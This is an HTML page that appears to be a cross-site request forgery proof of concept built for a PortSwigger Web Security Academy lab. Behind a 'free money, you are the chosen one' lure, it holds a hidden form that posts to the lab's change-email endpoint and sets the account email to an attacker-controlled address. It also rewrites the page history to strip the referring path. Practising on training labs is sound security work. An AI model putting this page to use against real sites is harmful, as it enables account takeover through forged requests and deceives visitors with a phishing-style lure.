<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<style>
    body{
        text-align: center;
        font-size: xx-large;
    
        
    }
    b{
        color:red;
    }
    input{
        font-size: x-large;
    }
   
</style>
<body>
    <h1>Congratulations</h1>    
    <h2>We're  giving away free money, because we like your work we have  chosen <br> <b>you</b></h2>
      <script>history.pushState('', '', '/')</script>
    <form action="https://ac881f0b1ea0dba98012282f00af0078.web-security-academy.net/my-account/change-email?id=wiener" method="POST">
      <input type="hidden" name="email" value="utocnik&#64;test&#46;com" />
      <input type="submit" value="Submit request" />
    </form>

      <script>
      alert("congratulations you are the choosen one");
      </script>


    <img src="./images (1).png" alt="">
    <img src="./IALb.gif" alt="">
</body>
</html>
